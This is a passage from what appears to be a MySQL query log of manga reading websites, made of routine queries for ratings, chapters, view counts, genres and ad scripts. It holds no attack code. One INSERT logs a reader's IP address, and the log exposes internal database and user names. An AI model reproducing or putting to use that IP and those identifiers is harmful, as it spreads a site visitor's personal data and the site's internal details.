(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330659021 Quit 330659022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330659022 Quit 330659023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330659023 Quit 330659024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330659024 Quit 330659025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330659025 Quit 330659026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330659026 Quit 330659027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330659027 Quit 330659028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330659028 Quit 330659029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330659029 Quit 330659030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330659030 Quit 330659031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330659031 Quit 330659032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330659032 Quit 330659033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330659033 Quit 330659034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330659034 Quit 330659035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330659035 Quit 330659036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330659036 Quit 330659037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330659037 Quit 330659038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330659038 Quit 330659039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330659039 Quit 330659040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330659040 Quit 330659041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330659041 Quit 330659042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330659042 Quit 330659043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330659043 Quit 330659044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330659044 Quit 330659045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330659045 Quit 330659046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330659046 Quit 330659047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330659047 Quit 330659048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330659048 Quit 330659049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330659049 Quit 330659050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330659050 Quit 330659051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330659051 Quit 260225 19:30:02 330659052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659052 Quit 330659053 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4616' and m.active = 1 330659053 Quit 330659054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659054 Query select * FROM chapters where id = '4616' 330659054 Quit 330659055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659055 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330659055 Quit 330659056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659056 Query Update chapters set view=view+1 where id = '4616' 330659056 Quit 330659057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659057 Query select * FROM chapters where id = '4616' 330659057 Quit 330659058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659058 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4616' and m.active = 1 330659058 Quit 330659059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659059 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4616', '47.79.206.64', 'mangaberri.com', '2026-02-26 03:30:02', '2026-02-26 03:30:02') 330659059 Quit 330659060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659060 Query select * FROM chapter_images where chapter_id = '4616' 330659060 Quit 330659061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659061 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330659061 Quit 330659062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659062 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330659062 Quit 330659063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659063 Quit 330659064 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659064 Quit 330659065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659065 Quit 330659066 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659066 Quit 330659067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659067 Quit 330659068 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659068 Quit 330659069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659069 Quit 330659070 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659070 Quit 330659071 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659072 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659071 Quit 330659072 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '形と型の違い' 330659072 Quit 330659073 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659073 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id AND m.active = 1) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330659073 Quit 330659074 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659075 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659074 Quit 330659075 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659075 Quit 330659076 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330659076 Quit 330659077 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330659077 Quit 330659078 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330659078 Quit 330659079 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330659079 Quit 330659080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330659080 Quit 330659081 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330659081 Quit 330659082 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330659082 Quit 330659083 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330659083 Quit 330659084 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330659084 Quit 330659085 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330659085 Quit 330659086 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330659086 Quit 330659087 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330659087 Quit 330659088 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330659088 Quit 330659089 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330659089 Quit 330659090 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330659090 Quit 330659091 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330659091 Quit 330659092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330659092 Quit 330659093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330659093 Quit 330659094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330659094 Quit 330659095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330659095 Quit 330659096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330659096 Quit 330659097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330659097 Quit 330659098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330659098 Quit 330659099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330659099 Quit 330659100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330659100 Quit 330659101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330659101 Quit 330659102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330659102 Quit 330659103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330659103 Quit 330659104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330659104 Quit 330659105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330659105 Quit 330659106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330659106 Quit 330659107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330659107 Quit 330659108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330659108 Quit 330659109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330659109 Quit 330659110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330659110 Quit 330659111 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330659111 Quit 330659112 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330659112 Quit 330659113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330659113 Quit 330659114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330659114 Quit 330659115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330659115 Quit 330659116 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330659116 Quit 330659117 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330659117 Quit 330659118 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330659118 Quit 330659119 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330659119 Quit 330659120 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330659120 Quit 330659121 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330659121 Quit 330659122 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330659122 Quit 330659123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330659123 Quit 330659124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330659125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330659125 Quit 330659126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330659124 Quit 330659126 Quit 330659127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330659127 Quit 330659128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330659128 Quit 330659129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330659129 Quit 330659130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330659130 Quit 330659131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330659131 Quit 330659132 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330659132 Quit 330659133 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330659133 Quit 330659134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330659134 Quit 330659135 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330659135 Quit 330659136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330659136 Quit 330659137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330659137 Quit 330659138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330659138 Quit 330659139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330659139 Quit 330659140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330659140 Quit 330659141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330659141 Quit 330659142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330659142 Quit 330659143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330659143 Quit 330659144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330659144 Quit 330659145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330659145 Quit 330659146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330659146 Quit 330659147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330659147 Quit 330659148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330659148 Quit 330659149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330659149 Quit 330659150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330659150 Quit 330659151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330659151 Quit 330659152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330659152 Quit 330659153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330659153 Quit 330659154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330659154 Quit 330659155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330659155 Quit 330659156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330659156 Quit 330659157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330659157 Quit 330659158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330659158 Quit 330659159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330659159 Quit 330659160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330659160 Quit 330659161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330659161 Quit 330659162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330659162 Quit 330659163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330659163 Quit 330659164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330659164 Quit 330659165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330659165 Quit 330659166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330659166 Quit 330659167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330659167 Quit 330659168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330659168 Quit 330659169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330659169 Quit 330659170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330659170 Quit 330659171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330659171 Quit 330659172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330659172 Quit 330659173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330659173 Quit 330659174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 